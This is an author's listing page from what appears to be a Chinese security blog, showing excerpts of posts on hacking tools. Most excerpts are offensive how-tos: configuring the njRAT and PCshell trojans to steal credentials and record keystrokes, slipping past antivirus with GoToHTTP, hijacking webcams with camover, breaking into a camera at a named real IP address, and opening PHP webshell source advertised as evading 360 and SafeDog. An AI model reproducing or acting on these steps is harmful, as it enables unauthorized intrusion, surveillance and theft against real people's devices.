- 博客(18)
- 收藏
- 关注
RSS订阅原创 网络安全与黑客攻防入门
通过这 15 天的课程学习,你将对网络安全有一个全面的认识和了解,掌握网络安全的基本概念、技术和方法。无论你是网络安全爱好者,还是希望从事网络安全相关工作的人士,这个课程都将为你打下坚实的基础。从本质上来说,网络安全的目标是保护网络系统、数据和用户的隐私与安全,防止未经授权的访问、破坏和窃取。我们将介绍黑客攻击、恶意软件、网络钓鱼、拒绝服务攻击等常见手段,分析它们的原理和特点,帮助你提高对网络威胁的警惕性。在课程的最后一天,我们将对整个课程进行总结,回顾所学的网络安全知识和技能。
2024-08-30 17:59:01
690
1
原创 PCshell远程控制下载及教程
PCshell是一款远程控制软件可管理服务器文件。上线ip为本机ip即木马文件被执行后的反弹地址。有助于公司管理以及渗透测试人员。可以选择自删除来使文件被执行后。注意:出内网ip要写公网地址。双击PCshell.exe。主机上线后可获取最高权限。可以点击链接测试查看。
2024-08-29 16:56:54
653
5
原创 网络安全:njRAT远控工具及下载
剩下的不说了值得一提:这个程序是rookit病毒很强力直接到内核杀毒软件在其运行之前可查杀,但在成功双击之后很难再次清除。受害者的设备,记录击键、访问摄像头、窃取浏览器中存储的凭据、上传/下载文件、操作注册表等。1.在一开始,我们要先将木马主程序,控制端安装在有公网地址(注意:一定保证外网可以访问)远控在渗透实战中的维权操作相当重要,今天为大家介绍一款工具:njrat。2.点击下面的builder并在红圈处输入自己的外网地址和开放端口。,可以下发相应的指令触发恶意软件的功能,也能获取目标的各种数据。
2023-08-27 17:42:02
2209
4
原创 无视杀软登录远程服务器GoToHTTP
在渗透测试中,我们会遇到服务器装有杀软导致提权木马上传不成功的问题。gotohttp.exe目录下直接生成了配置文件。上gotohttp官网直接输入name,tmp。这里给各位师傅另外提供一种思路。即可上线,随机关闭杀软后续提权。执行命令启动被控文件。
2023-06-26 08:24:25
1406
2
原创 文件上传漏洞实战getshell分析 形成 利用 修复
文件上传漏洞是指用户上传了一个可执行的脚本文件(php、jsp、xml、cer等文件),而WEB系统没有进行检测或逻辑做的不够安全。文件上传功能本身没有问题,问题在于上传后如何处理及解释文件。一般情况下,Web应用都会允许用户上传一些文件,如头像、附件等信息,如果Web应用没有对用户上传的文件进行有效的检查过滤,那么恶意用户就会上传一句话木马等Webshell,从而达到控制Web网站的目的。提示:以下是本篇文章正文内容,下面案例可供参考。webshell getshell
2022-12-20 15:47:57
1430
3
原创 中国蚁剑安装和使用教程(GOOD)
可以看到这是最高权限system相当于Linux中的root。官方加载器:(加载器分为Mac、Windows、Linux)在运行AntSword .exe。里面有一些好用的插件,大家自己去看。蚁剑的大名想必各位都听过今天来安装配置。可以上传,修改或删除。可以右键建个快捷方式。添加webshell地址和密码。2.添加webshell。第一个箭头单点进入终端。
2022-11-30 08:28:34
2414
原创 camover使用方法和快速安装
camover可以通过shodan和zoomeye自动获取目标,如下。以上是camover工具的使用帮助,可以用来接管你的web摄像头。如果你是Windows,请使用。你也可以换成你自己的api。camover使用帮助,camover使用方法。
2022-11-20 10:03:38
2916
1
原创 Windows git安装camover(详细)
camover安装部分可能git失败,过一会就好了,github官网的问题(多试几次必成功)安装camover需要先安装git,这个大家自己装。最好到自己用户目录下右键git bush Here。Windows安装camover教程。主要用git的Linux终端来实现。这些全部复制到git终端执行。如果用cmd会出现乱码。
2022-11-16 09:04:26
1720
2
原创 漏洞检测工具下载
超级字典下载,ssh,Telnet,http字典🎆🎆🎆🎆🎓🎓🎓链接:https://pan.baidu.com/s/1o_BctCFQsGszSDBC3V9P3g 提取码:6z73🚀🚀🚀🗽🗽
2022-11-12 21:44:36
259
2
原创 vbs基础教程
VBScript(Microsoft Visual Basic Script Editon).,微软公司可视化BASIC脚本版). 正如其字面所透露的信息, VBS(VBScript的进一步简写)是基于Visual Basic的脚本语言. Microsoft Visual Basic是微软公司出品的一套可视化编程工具, 语法基于Basic. 脚本语言, 就是不编译成二进制文件, 直接由宿主(host)解释源代码并执行, 简单点说就是你写的程序不需要编译成.exe, 而是直接给用户发送.vbs的源程序, 用户
2022-11-10 08:26:26
2475
原创 过检大马下载webshell,360,安全狗。。。
上传利器phpwebshell提权关注我获取更多资源<?php$password = "68xi";//设置密码error_reporting(E_ERROR);header("content-Type: text/html; charset=gb2312");set_time_limit(0);function Root_GP(&$array){ while(list($key,$var) = each($array)) {
2022-11-10 08:02:22
137663
2
原创 web攻防教学防黑客攻击,预防网站攻击
🎆🎆下面是我的一些web攻防学习资源,免费🎓🎓🎓🎓学习web知识是必要的,尤其个人建站更要懂得web攻防,防止黑客攻击链接:https://pan.baidu.com/s/1prjgpjiOKcEEIo5jENdHyA 提取码:702h hi,这是我用百度网盘分享的内容~复制这段内容打开「百度网盘」APP即可获取更多资源关注我私信获取
2022-11-10 07:59:37
225
2
原创 高级webshell,过狗
上面是一个思维导图下面是源码<?php $password = "68xi";//设置密码 error_reporting(E_ERROR); header("content-Type: text/html; charset=gb2312"); set_time_limit(0); function Root_GP(&$array) { while(list($key,$var) = each($array)) {
2022-11-09 19:23:29
9217
3
原创 sqlmap使用教程
注入之王:sqlmap的使用教程sqlmap -h可在终端输入sqlmap -h,sqlmap -hh查看帮助┌──(kali㉿localhost)-[~]└─$ sqlmap -h ___ __H_____ ___["]_____ ___ ___ {1.6.7#stable}|_ -| . ['] | .'| . ||___|_ [)]_|_|_|__,| _| |_|V... |_| https://sq
2022-11-09 11:19:12
688
2
原创 vnc viewer help vncviewer使用帮助
Your finger moves the mouse cursor rather than clicking where you touch, as you might expect with a touchscreen. This gives you more precise control of a high-resolution computer desktop.Gesture Action Explanation Zoom Pinch two fingers to
2022-10-14 17:23:51
341
1
原创 家里摄像头密码忘记找回
伪造cookie入侵网络摄像头实战测试 在生活中,摄像头随处可见。他们应用在很多方面。已经成了我们必备的工具。那他们可能有存在漏洞。今天我将进行测试。实战开始!第一步:确定目标这里不做过多说明,可以在shodan搜索webcam或jaws来确定目标我找到了88.248.56.88:80第二步:挖掘漏洞好,我想登录摄像头。但不知道密码是多少,弱密码枚举无果。先来看看 我们可以对之前用默认密码成功登录的页面进行抓包,找到处理页面登录逻辑的j
2022-10-13 10:46:09
4716
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人